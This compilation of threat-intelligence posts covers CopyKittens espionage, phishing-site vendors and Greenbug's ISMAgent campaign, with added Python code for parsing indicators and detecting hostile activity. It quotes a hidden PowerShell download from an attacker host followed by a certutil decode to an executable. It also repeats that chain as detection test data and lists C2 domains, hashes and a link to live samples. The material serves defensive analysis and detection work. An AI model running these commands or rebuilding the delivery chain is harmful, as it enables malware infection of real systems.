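# mixed-case hash, an out-of-range IP and a junk hash to exercise the checks.
SAMPLE = """\
Domain aolonline[.]cc
Domain googlerenewals[.]net
EmailAddress YYTXCONNECTICUT@GMAIL.COM
EmailAddress YYTXCONNECTICUT@GMAIL.COM
Filename HelpPane.exe
Filename shell.exe
Filename HelpPane.exe
Hash 58c66b3ddbc0df9810119bb688ea8fb0
Hash a4b2a6883ba0451429df29506a1f6995
Hash 58C66B3DDBC0DF9810119BB688EA8FB0
IPv4Address 54.245.195.101
IPv4Address 54.245.195.999
URL http://54.245.195[.]101/test.rtf
URL http://54.245.195[.]101/shell.exe
Host backup[.]aolonline[.]cc
Host mess[.]googlerenewals[.]net
Host backup[.]aolonline[.]cc
Hash not-a-hash
"""

if __name__ == "__main__":
    result = parse_indicators(SAMPLE)
    for kind, values in result.indicators.items():
        print(kind, len(values))
    print("rejected:", result.errors, "duplicates dropped:", result.duplicates)
    print("blocklist:", network_blocklist(result))
```

Rejected lines are reported with their line number rather than silently skipped, because a typo in an indicator feed is exactly the kind of error that goes unnoticed until the blocklist fails to fire. Filenames are kept case-sensitive on purpose: NSLS.dll and nsls.dll in the list above may well be the same artifact, but collapsing them is a judgement call for the analyst, not the parser.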

Operation Wilted Tulip – Exposing a Cyber Espionage Apparatus


CopyKittens is a cyberespionage group that has been operating since at least 2013. In November 2015, ClearSky and Minerva Labs published the first public report exposing its activity [1]. In March 2017, ClearSky published a second report exposing further incidents, some of which impacted the German Bundestag [2].

In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active. It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group’s modus operandi. We dubbed this activity Operation Wilted Tulip.

Targeting

CopyKittens is an active cyber espionage actor whose primary focus appears to be foreign espionage on strategic targets. Its main targets are in countries such as Israel, Saudi Arabia, Turkey, The United States, Jordan, and Germany. Occasionally individuals in other countries are targeted as well as UN employees.

Targeted organizations include government institutions (such as Ministry of Foreign Affairs), academic institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large IT companies. Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks.

For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign Affairs in the Turkish Republic of Northern Cyprus, trying to infect multiple targets in other government organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign affairs was used as decoy. In other cases, Israeli embassies were targeted, as well as foreign embassies in Israel.

Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments. Fake Facebook profiles have been used for spreading malicious links and building trust with targets. Some of the profiles have been active for years.

Malware

CopyKittens use several self-developed malware families and hacking tools that have not been publicly reported to date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt Strike loader; and ZPP, a file compression console program. The group also uses Matryoshka v1, a self-developed RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2, which is a new version with similar functionality.

The group often uses the trial version of Cobalt Strike, a publicly available commercial software for “Adversary Simulations and Red Team Operations.” Other public tools used by the group are Metasploit, a well-known free and open source framework for developing and executing exploit code against a remote target machine; Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, “a PowerShell and Python post-exploitation agent.” For detection and exploitation of internet-facing web servers, CopyKittens use Havij, Acunetix and sqlmap.

A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration. This feature is available both in Cobalt Strike and in Matryoshka.

Most of the infrastructure used by the group is in the U.S., Russia, and The Netherlands. Some of it has been in use for more than two years.

Read the full report: Operation Wilted Tulip
Indicators of compromise: indicators-wilted_tulip.csv (also available on PassiveTotal)
Yara rules: yara-apt_wilted_tulip.txt (courtesy of Florian Roth)
Samples: Live samples can be downloaded from the following link:
https://ln.sync[.]com/dl/f6772eb20/d8yt6kez-9q7eef3m-ai27ebms-8zcufi5f (Please email info@clearskysec.com to get the password.)

Acknowledgments

This research was facilitated by PassiveTotal for threat infrastructure analysis, and by MalNet for malware research.

[1] http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/
[2] http://www.clearskysec.com/copykitten-jpost/


The Economy Behind Phishing Websites Creation


The main aim of this research is to understand and describe the ecosystem of fake website developers and designers, and the basic economy behind the creation of fake websites that impersonate legitimate websites of banks, credit card companies and corporations. Mostly, the aim of those fake websites is stealing credentials (banking or corporate) or credit card information.

As part of this research we checked dozens of popular Russian- and English-speaking underground boards and forums, looking for vendors' topics that offer fake-webpage creation services. In the second stage, when it was available, we conducted a HUMINT operation and made direct contact with those cybercrime vendors of fake sites via instant messaging (mostly Jabber) to get a deeper understanding of their skills, work and pricing.

In total, we checked about 15 different phishing vendors; the main criteria were the vendor's skills, the prices and how the fake site is made.

We have checked a price for two main types of fake sites:

  1. A banking login page that is similar to the real one – the aim is to steal the login and password to a banking account.
  2. A second stage after the banking login page, in order to steal additional information – a page that does not exist on the real bank website and asks the user to enter their credit card number, expiration date and CVV number.

In addition, we have checked whether the vendors are just duplicating the original website, or developing it from scratch/partially.

Why does it matter? Because duplicated websites are mostly exposed and taken down more quickly, and as one vendor (Vendor9) told us, duplicated websites are in many cases blocked by Chrome/Safari:

Some of the vendors (like Vendor5) also add filters of various kinds to prolong the time before the fake website is exposed:

We have seen that some of the vendors, mostly the more qualified ones, are aware of those issues and mention them in the conversation, while the lower-quality "developers", in other words the script kiddies who try to earn money, do not even understand the difference between just duplicating a website and developing a fake from scratch. Note that some of the vendors duplicate the website and make basic "cleaning", i.e. basic changes in HTML and content.

Below is a table that summarizes the key points of the research (note that in the public version of this report we censored the vendors' nicknames, so as not to promote them):


We can see that two different types of professionals are required for fake website creation: developers and designers. Some of the fake website service providers, who are developers, work with third-party designers when a design or a change in the website is required. We can see this in our conversation with one of the vendors, "Vendor2":

From a pricing point of view, the average price for a banking login page is about $60. The pricing mostly falls into two groups: vendors who just duplicate the original site mostly price it at about $20-30, while those who develop the fake website from scratch price it at $50 or more, with some vendors asking about $150-200 for their work.

When we asked for pricing for an additional page that does not exist on the real website, meant for grabbing and stealing credit card data, in some cases the price was raised significantly, because this additional page requires development and design work rather than just duplicating an existing page.

Some of the fake site vendors also develop tools and panels that allow them to collect the stolen credentials in a proper and convenient way, and offer them to fake website buyers for an additional payment.

One of the additional services that some vendors offer is control panels that allow collecting all the required data and logs in a convenient manner.

One panel is introduced and being sold by "Vendor3":

Another one is built and developed by “Vendor5”:

Most of the vendors work very hard to promote their services and constantly bump their topics in different forums; although the basic pricing of most of them is relatively low, in order to gain a proper reputation they offer various kinds of promotions and discounts.

For example, one of the young leading vendors of the last year, “Vendor1”, offered free creation of fake websites for TLD .de for limited time:

This quotation, like most of the quotations and conversations with the vendors, was originally in Russian; it was translated, edited and redacted where necessary, while we tried to keep the essence of the chat and the language level as close to the original as possible.

In terms of time, some vendors are ready to do their work within ten minutes or within an hour, while others ask for several days.

Some of the vendors also publish colorful advertisements:


As they are acting as service providers, most of the vendors are very polite and patient in answering any questions that potential clients have (even too polite):


One of the vendors we had a conversation with also mentioned some interesting points about creating good banking fakes:

In this research, we present the vendors in depth, their modus operandi and pricing, and examples of their previous work.

Read the full report: The Economy behind Phishing Websites Creation

For the full, uncensored version of the report, email info@clearskysec.com

Recent ISMAgent Samples and Infrastructure by Iranian Threat Group GreenBug


Recently we detected new samples and infrastructure of ISMAgent, a trojan used by the Iranian threat group GreenBug. Interestingly, as part of the delivery mechanism, the malware is disguised as a base64 digital certificate and decoded via certutil.exe. This post describes the new campaign.

change managment.dot

Sample change managment.dot (812d3c4fddf9bb81d507397345a29bb0) exploits CVE-2017-0199 and calls the following URL:

http://www.msoffice-cdn[.]com/updatecdnsrv/prelocated/owa/auth/template.rtf

which in turn runs this command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -WindowStyle Hidden $webClient = New-Object System.Net.WebClient; $val = $webClient.DownloadString('https://a.pomf[.]cat/ntluca.txt'); add-content -path 'C:\Users\USER\AppData\Roaming/srvRep.txt' -value $val -force

The command downloads ntluca.txt from http://a.pomf[.]cat/ntluca.txt.

Disguised as a base64 digital certificate, the file actually decodes to an ISMAgent sample (96b47c5af8652ac99150bf602a88498b) via the following command:

"C:\Windows\System32\certutil.exe" -decode C:\Users\USER\AppData\Roaming\srvRep.txt C:\Users\USER\AppData\Roaming\srvConhost.exe
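As an added defender-side example (not code from the report), the Python below flags both links of this delivery chain in process command lines and checks whether a "certificate" file's base64 body really decodes to a PE rather than a DER certificate. The rule patterns, the log lines and the example.invalid download host are constructed for the example.

```python
import base64
import re
# Assumed detection rules for this added example: (name, regex over a process command line).
RULES = [
    ("certutil_decode", re.compile(r"certutil(\.exe)?\b.*\s-decode\b", re.I)),
    ("powershell_hidden_download",
     re.compile(r"powershell.*-WindowStyle\s+Hidden.*DownloadString", re.I)),
    ("download_to_appdata_txt",
     re.compile(r"DownloadString.*add-content.*AppData\\Roaming.*\.txt", re.I)),
]

def flag_command_lines(command_lines):
    """Return [(index, [rule names])] for every command line that matches at least one rule."""
    hits = []
    for i, cmd in enumerate(command_lines):
        names = [name for name, rx in RULES if rx.search(cmd)]
        if names:
            hits.append((i, names))
    return hits

PEM_BODY = re.compile(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)
def classify_certificate_text(text):
    """Decode the base64 body of a PEM-looking file and report what it really holds: a DER
    certificate starts with the ASN.1 SEQUENCE tag 0x30, a PE executable with the bytes 'MZ'."""
    m = PEM_BODY.search(text)
    if not m:
        return "not_pem"
    try:
        raw = base64.b64decode("".join(m.group(1).split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "invalid_base64"
    if raw.startswith(b"MZ"):
        return "pe_executable"
    if raw.startswith(b"\x30"):
        return "der_certificate"
    return "unknown"

def make_pem(payload):
    """Wrap raw bytes in a certificate-looking PEM envelope (used to build the sample below)."""
    return "-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----\n" % base64.b64encode(payload).decode()

# Constructed samples, not real telemetry; the first two mirror the chain described above,
# with the real download host replaced by the placeholder example.invalid.
SAMPLE_COMMANDS = [
    'powershell.exe -nologo -WindowStyle Hidden $webClient = New-Object System.Net.WebClient; '
    '$val = $webClient.DownloadString("https://example.invalid/ntluca.txt"); '
    'add-content -path "C:\\Users\\USER\\AppData\\Roaming\\srvRep.txt" -value $val -force',
    'certutil.exe -decode C:\\Users\\USER\\AppData\\Roaming\\srvRep.txt C:\\Users\\USER\\AppData\\Roaming\\srvConhost.exe',
    'certutil.exe -verify C:\\Temp\\vendor.cer',  # legitimate certutil use; must not fire
]
FAKE_CERT = make_pem(b"MZ\x90\x00" + b"\x00" * 60)  # a PE header hiding inside a "certificate"
```

`flag_command_lines(SAMPLE_COMMANDS)` returns hits for the first two entries only, and `classify_certificate_text(FAKE_CERT)` returns `pe_executable`.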

Indicators of compromise

Indicators of compromise are presented below and are available on PassiveTotal.



The Maltego graph below depicts the relationship among the indicators (click to enlarge):


Iranian Threat Agent Greenbug Impersonates Israeli High-Tech and Cyber Security Companies


Iranian threat agent Greenbug has been registering domains similar to those of Israeli high-tech and cyber security companies.

On 15 October 2017 a sample of ISMdoor was submitted to VirusTotal from Iraq. The sample name was WmiPrv.tmp (f5ef3b060fb476253f9a7638f82940d9) and it had the following PDB string:

C:\Users\Void\Desktop\v 10.0.194\x64\Release\swchost.pdb

Two domains were used for command and control:

thetaraysecurityupdate[.]com
securepackupdater[.]com

By pivoting off the registration details and server data of the two domains we discovered others registered by the threat agent. Eight contain the names of Israeli high-tech and cyber security companies, and one that of a Saudi Arabian company that tests and commissions major electrical equipment.

We estimate that the domains were registered in order to be used when targeting these companies, organisations related to them, or unrelated third parties. However, we do not have any indication that the companies were actually targeted or otherwise impacted.

Below are the malicious domains and the companies whose names were used.

Malicious domain | Impersonated company | Registration date
winsecupdater[.]com | (none) | 11/6/2016
dnsupdater[.]com | (none) | 12/4/2016
winscripts[.]net | (none) | 3/4/2017
allsecpackupdater[.]com | Uncertain | 4/8/2017
lbolbo[.]com | (none) | 4/8/2017
securepackupdater[.]com | Uncertain | 4/8/2017
thetaraysecurityupdate[.]com | ThetaRay (thetaray.com) – an Israeli cyber security and big data analytics company | 4/8/2017
ymaaz[.]com | YMAAZE (ymaaze.com) – a Saudi Arabian company testing and commissioning major electrical equipment | 4/8/2017
oospoosp[.]com | (none) | 8/9/2017
osposposp[.]com | (none) | 8/9/2017
znazna[.]com | (none) | 8/9/2017
mbsmbs[.]com | (none) | 8/9/2017
outbrainsecupdater[.]com | Outbrain (outbrain.com) – a major Israeli online advertising company | 8/9/2017
securelogicupdater[.]com | SecureLogic (space-logic.com) – likely an Israeli marketer of airport security systems by the same name; other companies with the same name exist | 8/9/2017
benyaminsecupdater[.]com | Uncertain | 8/9/2017
wixwixwix[.]com | Wix (wix.com) – a major Israeli cloud-based web development platform | 8/9/2017
biocatchsecurity[.]com | Biocatch (biocatch.com) – an Israeli company developing behavioral biometrics technology for fraud prevention and detection | 10/14/2017
corticasecurity[.]com | Cortica (cortica.com) – an Israeli company developing artificial intelligence technology | 10/14/2017
covertixsecurity[.]com | Covertix (covertix.com) – an Israeli data security company | 10/14/2017
arbescurity[.]com | Arbe Robotics (arberobotics.com) – an Israeli company developing autonomous driving technology | 10/14/2017
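An added example, not part of ClearSky's report: a small Python scorer that flags newly seen domains which combine a brand name from the table above with the "security/updater" style lure suffixes the registered domains use. The suffix list and the tolerance of one dropped or added letter (so that "arbescurity" and "ymaaz" still match) are assumptions made for this example.

```python
import re

# Brands come from the report's table; the lure-suffix list is an assumption for this example.
BRANDS = ["thetaray", "ymaaze", "outbrain", "securelogic", "wix",
          "biocatch", "cortica", "covertix", "arbe"]
LURE_SUFFIXES = ["securityupdate", "secupdater", "security", "updater", "update"]  # longest first

def edit_distance(a, b):
    """Levenshtein distance, so a suffix with one dropped or added letter still matches."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def strip_tld(domain):
    """'wixwixwix[.]com' or 'wixwixwix.com' -> 'wixwixwix' (handles defanged names)."""
    return re.split(r"\[\.\]|\.", domain.lower())[0]

def matched_brand(label):
    """Longest brand inside the label; brands longer than four letters also match with their
    last letter dropped (so 'ymaaz' maps to YMAAZE). None when nothing matches."""
    found = [b for b in BRANDS if b in label or (len(b) > 4 and b[:-1] in label)]
    return max(found, key=len) if found else None

def lure_suffix(label):
    """First lure suffix whose spelling is within one edit of the label's tail, else None."""
    for s in LURE_SUFFIXES:
        for n in (len(s) + 1, len(s), len(s) - 1):
            if len(label) > n and edit_distance(label[-n:], s) <= 1:
                return s
    return None

def score_domain(domain):
    """Return (brand, suffix, verdict) for one domain; allow-list the brands' own domains first."""
    label = strip_tld(domain)
    brand, suffix = matched_brand(label), lure_suffix(label)
    verdict = {(True, True): "impersonation_with_lure", (True, False): "brand_lookalike",
               (False, True): "lure_suffix_only", (False, False): "no_match"}
    return brand, suffix, verdict[(brand is not None, suffix is not None)]

# Domains taken from the table above (defanged, as printed in the report).
DOMAINS = ["thetaraysecurityupdate[.]com", "arbescurity[.]com", "ymaaz[.]com",
           "winsecupdater[.]com", "lbolbo[.]com", "wixwixwix[.]com"]

if __name__ == "__main__":
    for d in DOMAINS:
        print(d, score_domain(d))
```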

Indicators of compromise

Indicators of compromise are presented below and are available on PassiveTotal.




The Maltego graph below depicts the relationship among the indicators (click to enlarge):


Update 2017-10-25 – three hashes removed from IOC list

The following hashes were mistakenly included in the IOC list and have been removed, as they are unrelated to the campaign:
c594b52ec8922a1e980a2ea31b1d1157
179cb8839e9ee8e9e6665b0986bf7811
d30c4df6de21275ae69a4754fc2372ef
